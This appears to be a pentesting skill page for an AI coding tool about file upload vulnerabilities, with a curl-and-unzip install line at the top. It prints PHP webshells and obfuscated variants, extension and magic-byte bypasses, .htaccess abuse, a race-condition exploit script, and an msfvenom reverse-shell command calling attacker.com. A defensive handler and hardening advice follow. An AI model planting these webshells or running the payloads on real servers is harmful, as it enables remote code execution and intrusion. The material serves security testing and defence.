Install
mkdir -p .claude/skills/file-upload-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/4389" && unzip -o skill.zip -d .claude/skills/file-upload-testing && rm skill.zip
Installs to .claude/skills/file-upload-testing. Note that `unzip -o` overwrites existing files in that directory; run `unzip -l skill.zip` first if you want to see what the archive contains before extracting it.
About this skill
File Upload Vulnerability Testing
Overview
File upload is a common web application feature, but it carries several security risks. This skill covers how to detect, exploit, and defend against file upload vulnerabilities.
Vulnerability Types
1. Unvalidated file type
Client-side-only validation:
// Bypassable: this runs in the browser, so an attacker simply sends the request without it
if (!file.name.endsWith('.jpg')) {
  alert('Only image uploads are allowed');
}
2. File content not validated
Extension check only:
// Dangerous code: trusts the client-supplied name and never inspects the bytes
if (pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 'jpg') {
  $filename = $_FILES['file']['name'];
  move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $filename);
}
A file named shell.jpg that contains PHP passes this check; whether it runs then depends only on the web server's handler configuration (see the parser quirks and .htaccess sections below).
3. Path traversal
Unfiltered filename (if the server joins the client-supplied name onto the upload directory, the file is written outside it):
filename: ../../../etc/passwd
filename: ..\..\..\windows\system32\config\sam
4. File overwrite
Predictable filenames let an attacker guess and overwrite other users' uploads:
uploads/1.jpg
uploads/2.jpg
Testing Methodology
1. Basic detection
Test a range of executable file types:
- .php, .jsp, .asp, .aspx
- .php3, .php4, .php5, .phtml
- .jspx, .jspf
- .htaccess, .htpasswd
Test double extensions:
shell.php.jpg
shell.jpg.php
Test case variation:
shell.PHP
shell.PhP
2. Content-Type bypass
Change the Content-Type header of the file part in the multipart body:
Content-Type: image/jpeg
# but the part body is PHP code
Magic bytes:
// prepend an image signature to the PHP code
GIF89a<?php phpinfo(); ?>
3. Parser quirks
Apache:
shell.php.xxx  # With AddHandler/AddType-style PHP binding, mod_mime evaluates every extension, so the .php segment still selects the PHP handler; a <FilesMatch "\.php$"> binding is not affected
IIS:
shell.asp;.jpg  # IIS 6 truncates the name at ';' and runs it as shell.asp
shell.asp:.jpg  # NTFS alternate data stream syntax; on IIS 6 this produces an empty shell.asp
Nginx / PHP:
shell.jpg%00.php  # relies on null-byte truncation of the filename (fixed in PHP 5.3.4 and in the affected Nginx versions)
4. Race condition
Request the file immediately after upload:
# Upload a .php file and hit it in the window between the server writing it and its
# validation step deleting it. A single GET rarely lands in the window, so loop.
import threading
import time
import requests

def upload():
    files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>')}
    requests.post('http://target.com/upload', files=files)

def access():
    for _ in range(50):
        r = requests.get('http://target.com/uploads/shell.php?cmd=id')
        if r.status_code == 200 and 'uid=' in r.text:
            print(r.text)
            break
        time.sleep(0.01)

threading.Thread(target=upload).start()
threading.Thread(target=access).start()
Exploitation Techniques
PHP WebShell
Basic webshell:
<?php system($_GET['cmd']); ?>
One-line trojan (一句话木马):
<?php eval($_POST['a']); ?>
Filter bypass (the function name is supplied at request time, so the word "system" never appears in the file):
<?php
$_GET['cmd']($_POST['a']);
// Usage: ?cmd=system with POST body a=id
.htaccess exploitation
Upload a .htaccess:
AddType application/x-httpd-php .jpg
Then upload shell.jpg (actually PHP code). This requires AllowOverride to permit the directive in the upload directory and PHP running as an Apache module (mod_php); with PHP-FPM the type mapping does nothing and a SetHandler directive would be needed instead.
Image shells
GIF image shell:
GIF89a
<?php
phpinfo();
?>
PNG image shell:
# Embed PHP code in a PNG with a tool (png2php.py, as named by the skill)
python3 png2php.py shell.php shell.png
Combining with file inclusion
If a file inclusion vulnerability exists, the uploaded file never needs a script extension: include() executes whatever PHP tags it finds.
# Upload an image containing PHP code,
# then execute it through the include
?file=uploads/shell.jpg
Bypass Techniques
Extension bypass
Double extension:
shell.php.jpg
shell.php;.jpg
shell.php%00.jpg
Case variation:
shell.PHP
shell.PhP
Special characters (Windows silently strips trailing dots and spaces when the file is written, so the stored name becomes shell.php):
shell.php.
shell.php (trailing space)
shell.php%20
Content-Type bypass
Change the Content-Type header of the file part:
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Magic-bytes bypass
Prepend a file signature:
// JPEG
\xFF\xD8\xFF\xE0<?php phpinfo(); ?>
// GIF
GIF89a<?php phpinfo(); ?>
// PNG
\x89\x50\x4E\x47<?php phpinfo(); ?>
Code obfuscation
Short tags:
<?= system($_GET['cmd']); ?>
Split the function name across variables (note that $a.$b($_GET['cmd']) does not work: the call binds before the concatenation, so PHP would try to call tem()):
<?php
$a='sys';
$b='tem';
$f=$a.$b;
$f($_GET['cmd']);
Tools
Burp Suite
- Intercept the upload request
- Modify the filename and content
- Test the bypass techniques above
Upload Bypass
# Try a range of techniques against an upload endpoint (invocation as given by the skill)
python upload_bypass.py -u http://target.com/upload -f shell.php
WebShell generation
# Generate a PHP reverse shell payload; LHOST must be reachable from the target and a matching handler must be listening
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f raw > shell.php
Verification and Reporting
Verification steps
- Confirm that a malicious file can be uploaded
- Verify that the file is executed (or otherwise interpreted) by the server
- Assess impact (command execution, data exposure, etc.)
- Record a complete PoC
Report contents
- Location of the vulnerability and the upload function
- File types that can be uploaded and how they get executed
- Full exploitation steps and PoC
- Remediation advice (file type validation, content checks, isolated storage, etc.)
Defenses
Recommended measures
- File type allowlist
  ALLOWED_EXTENSIONS = {'jpg', 'png', 'gif'}
  if '.' not in filename:
      raise ValueError("File type not allowed")  # without this, rsplit() raises IndexError on a name with no dot
  ext = filename.rsplit('.', 1)[1].lower()
  if ext not in ALLOWED_EXTENSIONS:
      raise ValueError("File type not allowed")
- File content validation
  import magic
  file_type = magic.from_buffer(file_content, mime=True)
  if not file_type.startswith('image/'):
      raise ValueError("Invalid file content")
  libmagic classifies by the leading bytes, so a GIF89a<?php ... ?> polyglot still reports image/gif; content validation narrows what gets through but does not replace the storage controls below.
- Rename the file
  import uuid
  filename = str(uuid.uuid4()) + '.' + ext
- Isolated storage
  - Store files outside the web root
  - Serve them through a script rather than directly
  - Disable execution permissions (and any script handler) on the storage directory
- File scanning
  - Scan with antivirus
  - Inspect file content
  - Remove executable permissions
- Size limits
  MAX_SIZE = 5 * 1024 * 1024  # 5MB
  if file.size > MAX_SIZE:
      raise ValueError("File too large")
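The measures above only hold together when applied in one place and in the right order: allowlist on the final extension, content check against that extension, size limit, server-chosen name, write outside the web root without execute permission, and a proxy read that cannot be steered out of the store. The following is an added example written for this page, not the skill's own code, that does this in one handler and runs the page's attacker inputs through it. It uses a small stdlib signature table in place of python-magic, and the upload root under the system temp directory is a placeholder for a real location outside the web root.

```python
import os
import re
import tempfile
import uuid

# Allowed extension -> signature the content must start with (stdlib stand-in for python-magic).
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
MAX_SIZE = 5 * 1024 * 1024
# Placeholder storage root outside the web root; no script handler or execute bit applies here.
UPLOAD_ROOT = os.path.join(tempfile.gettempdir(), "app-uploads-quarantine")
STORED_NAME = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\.(?:jpg|png|gif)")


class UploadRejected(ValueError):
    pass


def extension_of(client_name):
    """The client name is used for one thing only: its final extension.
    Directory parts, NUL bytes and trailing dots/spaces (silently dropped by Windows) are refused."""
    if "\x00" in client_name:
        raise UploadRejected("NUL in filename")
    base = os.path.basename(client_name.replace("\\", "/"))
    if base != base.rstrip(". ") or "." not in base:
        raise UploadRejected("unusable filename")
    return base.rsplit(".", 1)[1].lower()


def store(client_name, data, root=UPLOAD_ROOT):
    """Allowlist -> size check -> signature check -> server-chosen name -> O_EXCL, non-executable write."""
    ext = extension_of(client_name)
    if ext not in ALLOWED:
        raise UploadRejected("type not allowed")
    if len(data) > MAX_SIZE:
        raise UploadRejected("too large")
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    os.makedirs(root, mode=0o750, exist_ok=True)
    name = f"{uuid.uuid4()}.{ext}"  # unpredictable and never derived from client input
    fd = os.open(os.path.join(root, name), os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return name


def serve(stored_name, root=UPLOAD_ROOT):
    """Proxy read for the isolated store: only names we generated, resolved strictly inside root."""
    if not STORED_NAME.fullmatch(stored_name):
        raise UploadRejected("bad stored name")
    path = os.path.realpath(os.path.join(root, stored_name))
    if os.path.dirname(path) != os.path.realpath(root):
        raise UploadRejected("path escapes upload root")
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Constructed attacker inputs from this page run through the handler; returns the outcome of each."""
    root = tempfile.mkdtemp()
    php = b"<?php phpinfo(); ?>"
    attempts = {
        "shell.php": php,
        "shell.jpg.php": php,
        "shell.php.jpg": php,              # double extension: extension passes, signature check fails
        "shell.php;.jpg": php,
        "shell.php.": php,                 # trailing dot
        "../../../etc/passwd": b"root:x:0:0",
        "cat.gif": b"GIF89a" + php,        # polyglot: passes the signature check but is stored inert
    }
    outcome = {}
    for name, data in attempts.items():
        try:
            stored = store(name, data, root)
            outcome[name] = ("stored", stored, serve(stored, root) == data)
        except UploadRejected as e:
            outcome[name] = ("rejected", str(e), None)
    try:
        serve("../../../etc/passwd", root)
        outcome["serve-traversal"] = "served"
    except UploadRejected:
        outcome["serve-traversal"] = "rejected"
    return outcome


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The polyglot case is the one to note: the GIF89a<?php ... ?> file is accepted, exactly as the bypass sections predict, and that is acceptable only because it lands under a random name in a directory no script handler ever sees. Re-encoding images on upload would strip the payload as well, but the storage controls are what make the acceptance harmless.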
Notes
- Test only in authorised environments
- Avoid uploading malicious files to production systems
- Clean up uploaded files promptly after testing
- Be aware of parsing differences between server types
More by Ed1s0nZ